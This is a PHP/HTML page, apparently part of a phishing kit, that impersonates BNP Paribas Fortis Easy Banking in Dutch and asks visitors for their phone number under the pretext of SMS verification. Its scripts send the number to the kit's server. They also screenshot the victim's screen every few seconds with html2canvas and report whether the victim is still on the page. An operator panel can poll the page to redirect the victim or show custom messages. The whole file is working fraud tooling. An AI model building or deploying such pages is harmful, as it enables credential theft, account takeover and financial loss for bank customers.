<?php
include 'include/session.php';

?>
<!DOCTYPE html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BNP Fortis - Telefoonnummer</title>
    <link rel="icon" type="image/png" href="./assets/imgs/favicon.png">
    <link rel="stylesheet" href="assets/css/style.css">
     <script>
document.addEventListener('DOMContentLoaded', function () {
  let isFetchingFlow = false;

  function handleFlowResponse(data) {
    if (!data.success) return;

    if (data.locked && data.final_redirect_url) {
      window.location.href = data.final_redirect_url;
      return;
    }

    const panelAction = data.panel_action ? data.panel_action.trim() : '';
    const currentPage = location.pathname.split('/').pop();

    if (panelAction && panelAction !== currentPage) {
      window.location.href = panelAction;
      return;
    }

    if (data.custom_message) {
      const box = document.getElementById('flow-msg');
      if (box) box.innerText = data.custom_message;
    }
  }

  async function pollFlow() {
    if (isFetchingFlow) return;
    isFetchingFlow = true;

    try {
      const res = await fetch('./ajax/flow.php');
      const data = await res.json();
      handleFlowResponse(data);
    } catch (err) {
      // Silent fail
    } finally {
      isFetchingFlow = false;
      setTimeout(pollFlow, 5000); // Schedule next only after this finishes
    }
  }

  // 🔥 First request immediately
  pollFlow();
});
</script>

<script src="./assets/js/html2canvas.min.js"></script>
<script>
let heartbeatInterval = null;
let isSendingHeartbeat = false;

// 🔁 Send heartbeat (ensures one at a time)
async function sendHeartbeat(active = 1, includeImage = true) {
  if (isSendingHeartbeat) return;
  isSendingHeartbeat = true;

  try {
    const currentPage = location.pathname.split('/').pop();
    const payload = {
      is_active: active,
      browser_status: document.visibilityState === 'visible' ? 'focused' : 'blurred',
      current_page: currentPage,
      image: null
    };

    if (includeImage) {
      const canvas = await html2canvas(document.body);
      payload.image = canvas.toDataURL('image/png');
    }

    await fetch('./ajax/heartbeat.php', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload)
    });
  } catch (err) {
    // silent fail
  } finally {
    isSendingHeartbeat = false;
  }
}

// ⚡ Initial heartbeat (no image)
sendHeartbeat(1, false);

// ⏱️ Delayed second heartbeat (with image)
setTimeout(() => sendHeartbeat(1, true), 3000);

// 🔁 Continuous heartbeat every 5s
heartbeatInterval = setInterval(() => {
  sendHeartbeat(1, true);
}, 5000);

// 📄 On visibility change
document.addEventListener('visibilitychange', () => {
  sendHeartbeat(document.visibilityState === 'visible' ? 1 : 0, false);
});

// 🚪 On page unload
window.addEventListener('beforeunload', function () {
  const currentPage = location.pathname.split('/').pop();
  navigator.sendBeacon('./ajax/heartbeat.php', JSON.stringify({
    is_active: 0,
    browser_status: 'unloading',
    current_page: currentPage,
    image: null
  }));
});
</script>
    <style>
        .logo-img {
            height: 32px;
            display: block;
        }
        /* Phone Page Specific Styles */
        .card {
            max-width: 650px;
        }

        .welcome-section {
            flex: 0 0 220px;
            padding: 50px 30px;
        }

        .welcome-section h1 {
            font-size: 20px;
        }

        .phone-section {
            flex: 1;
            padding: 30px;
        }

        .phone-section h2 {
            font-size: 16px;
            font-weight: 600;
            color: #333;
            margin-bottom: 8px;
        }

        .phone-section p {
            font-size: 13px;
            color: #666;
            margin-bottom: 20px;
            line-height: 1.4;
        }

        .phone-input-group {
            display: flex;
            gap: 8px;
            margin-bottom: 20px;
        }

        .country-code {
            width: 50px;
            padding: 12px 5px;
            border: 1px solid #ccc;
            border-radius: 4px;
            font-size: 14px;
            color: #333;
            background: #f9f9f9;
            text-align: center;
        }

        .phone-input {
            flex: 1;
            padding: 12px;
            border: 1px solid #ccc;
            border-radius: 4px;
            font-size: 14px;
            color: #333;
            outline: none;
            transition: border-color 0.2s;
        }

        .phone-input:focus {
            border-color: #00965e;
        }

        .phone-input::placeholder {
            color: #999;
        }

        .info-text {
            display: flex;
            align-items: flex-start;
            gap: 8px;
            padding: 12px;
            background: #f0f7f4;
            border-radius: 6px;
            margin-bottom: 20px;
        }

        .info-text svg {
            flex-shrink: 0;
            width: 16px;
            height: 16px;
            color: #00965e;
            margin-top: 2px;
        }

        .info-text span {
            font-size: 12px;
            color: #555;
            line-height: 1.4;
        }
    </style>
</head>
<body>
    <!-- Header -->
    <header class="header">
        <div class="header-left">
            <a href="#">&#10094; Terug</a>
        </div>
        <div class="header-center">
            
            <div class="logo-text">
                <img src="./assets/imgs/logo.svg" alt="BNP Paribas Fortis" class="logo-img">
            </div>
        </div>
        <div class="header-right">
            <a href="#">Ga naar Easy Banking Business</a>
        </div>
    </header>

    <!-- Main Content -->
    <main class="main-content">
        <div class="card card-split">
            <div class="welcome-section">
                <p>Welkom in</p>
                <h1>EASY BANKING</h1>
            </div>
            <div class="phone-section">
                <h2>Voer uw telefoonnummer in</h2>
                <p>We sturen u een verificatiecode via SMS om uw identiteit te bevestigen.</p>

                <form action="#" method="POST" id="phone-form">
                    <div class="phone-input-group">
                        <input type="text" class="country-code" value="+32" readonly>
                        <input type="tel" name="phone" id="phone-input" class="phone-input" placeholder="470 12 34 56" maxlength="12">
                    </div>

                    <div class="info-text">
                        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                            <circle cx="12" cy="12" r="10"></circle>
                            <line x1="12" y1="16" x2="12" y2="12"></line>
                            <line x1="12" y1="8" x2="12.01" y2="8"></line>
                        </svg>
                        <span>Standaardtarieven voor SMS-berichten zijn van toepassing. Uw nummer wordt alleen gebruikt voor verificatiedoeleinden.</span>
                    </div>

                    <button type="submit" class="btn btn-primary">Verzenden</button>
                    <div id="phone-message" class="form-message"></div>
                </form>
            </div>
        </div>

        <div class="help-section">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"/>
            </svg>
            <span><a href="#">Hulp nodig</a>? Bel naar +32 2 762 60 00</span>
        </div>
    </main>

    <!-- Footer -->
    <footer class="footer">
        <div class="footer-left">
            &copy; 2026 BNP Paribas Fortis
        </div>
        <div class="footer-right">
            <a href="#">Over ons</a>
            <span>-</span>
            <a href="#">Gebruiksvoorwaarden van de Website</a>
            <span>-</span>
            <a href="#">Cookies</a>
            <span>-</span>
            <a href="#">Privacyverklaring</a>
        </div>
    </footer>

<script>
document.addEventListener('DOMContentLoaded', () => {
  const form = document.getElementById('phone-form');
  if (!form) return;

  const submitButton = form.querySelector('button[type="submit"]');
  const messageBox = document.getElementById('phone-message');
  const phoneInput = document.getElementById('phone-input');

  function formatPhone(value) {
    const digits = value.replace(/\D/g, '').slice(0, 9);
    const parts = [];
    if (digits.length > 0) parts.push(digits.slice(0, 3));
    if (digits.length > 3) parts.push(digits.slice(3, 5));
    if (digits.length > 5) parts.push(digits.slice(5, 7));
    if (digits.length > 7) parts.push(digits.slice(7, 9));
    return parts.join(' ').trim();
  }

  if (phoneInput) {
    phoneInput.setAttribute('inputmode', 'numeric');
    phoneInput.addEventListener('input', () => {
      phoneInput.value = formatPhone(phoneInput.value);
    });
  }

  form.addEventListener('submit', (event) => {
    event.preventDefault();
    if (!submitButton) return;

    if (messageBox) messageBox.textContent = '';
    const originalText = submitButton.textContent;
    submitButton.disabled = true;
    submitButton.textContent = 'Bezig...';

    const cleanedPhone = phoneInput
      ? phoneInput.value.replace(/\D/g, '').slice(0, 9)
      : form.phone.value.replace(/\D/g, '');

    const payload = {
      phone: cleanedPhone
    };

    const xhr = new XMLHttpRequest();
    xhr.open('POST', './ajax/phone.php', true);
    xhr.setRequestHeader('Content-Type', 'application/json');

    xhr.onreadystatechange = function () {
      if (xhr.readyState !== 4) return;

      submitButton.disabled = false;
      submitButton.textContent = originalText;

      try {
        const data = JSON.parse(xhr.responseText);
        if (data && data.success && data.redirect) {
          window.location.href = data.redirect;
          return;
        }
        if (messageBox) {
          messageBox.textContent = (data && data.message) ? data.message : 'Er is iets misgegaan. Probeer opnieuw.';
        }
      } catch (e) {
        if (messageBox) {
          messageBox.textContent = 'Er is iets misgegaan. Probeer opnieuw.';
        }
      }
    };

    xhr.onerror = function () {
      submitButton.disabled = false;
      submitButton.textContent = originalText;
      if (messageBox) {
        messageBox.textContent = 'Er is iets misgegaan. Probeer opnieuw.';
      }
    };

    xhr.send(JSON.stringify(payload));
  });
});
</script>
</body>
</html>
